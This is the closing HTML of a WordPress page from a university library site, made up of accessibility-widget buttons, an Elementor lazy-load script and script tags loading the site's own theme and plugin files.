<div class="a_module_exe"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-highlight-links" aria-label="Highlight Links" title="Highlight Links">Highlight Links</button> </div> </div><div class="a_module wah_clear_cookies"> <div class="a_module_exe"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-clear-cookies" aria-label="Clear cookies" title="Clear cookies">Clear cookies</button> </div> </div><div class="a_module wah_greyscale"> <div class="a_module_exe"> <button tabindex="-1" type="button" id="greyscale" class="greyscale wah-action-button wahout wah-call-greyscale" aria-label="Images Greyscale" title="Images Greyscale">Images Greyscale</button> </div> </div><div class="a_module wah_invert"> <div class="a_module_exe"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-invert" aria-label="Invert Colors" title="Invert Colors">Invert Colors</button> </div> </div><div class="a_module wah_remove_animations"> <div class="a_module_exe"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-remove-animations" aria-label="Remove Animations" title="Remove Animations">Remove Animations</button> </div> </div> <button type="button" title="Close sidebar" class="wah-skip close-wah-sidebar"> Close </button> </div> </div> <script type="text/javascript"> var roleLink = 1; var removeLinkTitles = 1; </script> <style> @media only screen and (max-width: 480px) {div#wp_access_helper_container {display: none;}} </style> <div class="wah-free-credits"> <div class="wah-free-credits-inner"> <a href="https://accessibility-helper.co.il/" target="_blank" title="Accessibility by WP Accessibility Helper Team">Accessibility by WAH</a> </div> </div> <!-- WP Accessibility Helper. Created by Alex Volkov. --> </div> <script> const lazyloadRunObserver = () => { const lazyloadBackgrounds = document.querySelectorAll( `.e-con.e-parent:not(.e-lazyloaded)` ); const lazyloadBackgroundObserver = new IntersectionObserver( ( entries ) => { entries.forEach( ( entry ) => { if ( entry.isIntersecting ) { let lazyloadBackground = entry.target; if( lazyloadBackground ) { lazyloadBackground.classList.add( 'e-lazyloaded' ); } lazyloadBackgroundObserver.unobserve( entry.target ); } }); }, { rootMargin: '200px 0px 200px 0px' } ); lazyloadBackgrounds.forEach( ( lazyloadBackground ) => { lazyloadBackgroundObserver.observe( lazyloadBackground ); } ); }; const events = [ 'DOMContentLoaded', 'elementor/lazyload/observe', ]; events.forEach( ( event ) => { document.addEventListener( event, lazyloadRunObserver ); } ); </script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wp-accessibility-helper/assets/js/wp-accessibility-helper.min.js?ver=1.0.0" id="wp-accessibility-helper-js"></script> <script id="wpvr-js-extra"> var wpvr_public = {"notice_active":"","notice":""}; </script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/wpvr/public/js/wpvr-public.js?ver=8.5.17" id="wpvr-js"></script> <script id="eac-frontend-js-before"> var eacElementsPath = {"proxies":"https:\/\/www.ukm.my\/ptsl\/wp-content\/plugins\/elementor-addon-components\/includes\/proxy\/","pdfJs":"https:\/\/www.ukm.my\/ptsl\/wp-content\/plugins\/elementor-addon-components\/assets\/js\/pdfjs\/","osmImages":"https:\/\/www.ukm.my\/ptsl\/wp-content\/plugins\/elementor-addon-components\/assets\/images\/","osmConfig":"https:\/\/www.ukm.my\/ptsl\/wp-content\/plugins\/elementor-addon-components\/includes\/config\/osm\/"} </script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/elementor-addon-components/assets/js/eac-frontend.min.js?ver=2.3.2" id="eac-frontend-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/elementor-addon-components/assets/js/fancybox/jquery.fancybox.min.js?ver=3.5.7" id="eac-fancybox-js" defer data-wp-strategy="defer"></script> <script src="https://www.ukm.my/ptsl/wp-includes/js/imagesloaded.min.js?ver=5.0.0" id="imagesloaded-js"></script> <script id="oceanwp-main-js-extra"> var oceanwpLocalize = {"nonce":"46f462d5d5","isRTL":"","menuSearchStyle":"drop_down","mobileMenuSearchStyle":"disabled","sidrSource":null,"sidrDisplace":"1","sidrSide":"left","sidrDropdownTarget":"link","verticalHeaderTarget":"link","customScrollOffset":"0","customSelects":".woocommerce-ordering .orderby, #dropdown_product_cat, .widget_categories select, .widget_archive select, .single-product .variations_form .variations select"}; </script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/theme.min.js?ver=4.0.5" id="oceanwp-main-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/drop-down-mobile-menu.min.js?ver=4.0.5" id="oceanwp-drop-down-mobile-menu-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/drop-down-search.min.js?ver=4.0.5" id="oceanwp-drop-down-search-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/vendors/magnific-popup.min.js?ver=4.0.5" id="ow-magnific-popup-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/ow-lightbox.min.js?ver=4.0.5" id="oceanwp-lightbox-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/vendors/flickity.pkgd.min.js?ver=4.0.5" id="ow-flickity-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/ow-slider.min.js?ver=4.0.5" id="oceanwp-slider-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/scroll-effect.min.js?ver=4.0.5" id="oceanwp-scroll-effect-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/scroll-top.min.js?ver=4.0.5" id="oceanwp-scroll-top-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/themes/oceanwp/assets/js/select.min.js?ver=4.0.5" id="oceanwp-select-js"></script> <script id="eael-general-js-extra"> var localize = {"ajaxurl":"https:\/\/www.ukm.my\/ptsl\/wp-admin\/admin-ajax.php","nonce":"53e0b1a275","i18n":{"added":"Added ","compare":"Compare","loading":"Loading..."},"eael_translate_text":{"required_text":"is a required field","invalid_text":"Invalid","billing_text":"Billing","shipping_text":"Shipping","fg_mfp_counter_text":"of"},"page_permalink":"https:\/\/www.ukm.my\/ptsl\/?page_id=247","cart_redirectition":"","cart_page_url":"","el_breakpoints":{"mobile":{"label":"Mobile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Landscape","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Widescreen","value":2400,"default_value":2400,"direction":"min","is_enabled":false}}}; </script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/essential-addons-for-elementor-lite/assets/front-end/js/view/general.min.js?ver=6.1.2" id="eael-general-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.27.5" id="elementor-webpack-runtime-js"></script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.27.5" id="elementor-frontend-modules-js"></script> <script src="https://www.ukm.my/ptsl/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3" id="jquery-ui-core-js"></script> <script id="elementor-frontend-js-before"> var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Share on Facebook","shareOnTwitter":"Share on Twitter","pinIt":"Pin it","download":"Download","downloadImage":"Download image","fullscreen":"Fullscreen","zoom":"Zoom","share":"Share","playVideo":"Play Video","previous":"Previous","next":"Next","close":"Close","a11yCarouselPrevSlideMessage":"Previous slide","a11yCarouselNextSlideMessage":"Next slide","a11yCarouselFirstSlideMessage":"This is the first slide","a11yCarouselLastSlideMessage":"This is the last slide","a11yCarouselPaginationBulletMessage":"Go to slide"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Mobile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Landscape","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Widescreen","value":2400,"default_value":2400,"direction":"min","is_enabled":false}},"hasCustomBreakpoints":false},"version":"3.27.5","is_static":false,"experimentalFeatures":{"additional_custom_breakpoints":true,"container":true,"e_swiper_latest":true,"e_onboarding":true,"home_screen":true,"landing-pages":true,"nested-elements":true,"editor_v2":true,"link-in-bio":true,"floating-buttons":true},"urls":{"assets":"https:\/\/www.ukm.my\/ptsl\/wp-content\/plugins\/elementor\/assets\/","ajaxurl":"https:\/\/www.ukm.my\/ptsl\/wp-admin\/admin-ajax.php","uploadUrl":"https:\/\/www.ukm.my\/ptsl\/wp-content\/uploads"},"nonces":{"floatingButtonsClickTracking":"7675989b73"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description"},"post":{"id":247,"title":"background-bi%20%E2%80%93%20ptsl","excerpt":"","featuredImage":"https:\/\/www.ukm.my\/ptsl\/wp-content\/uploads\/2020\/06\/7H7A2819_1-1024x683.jpg"}}; </script> <script src="https://www.ukm.my/ptsl/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.27.5" id="elementor-frontend-js"></script> </body> </html>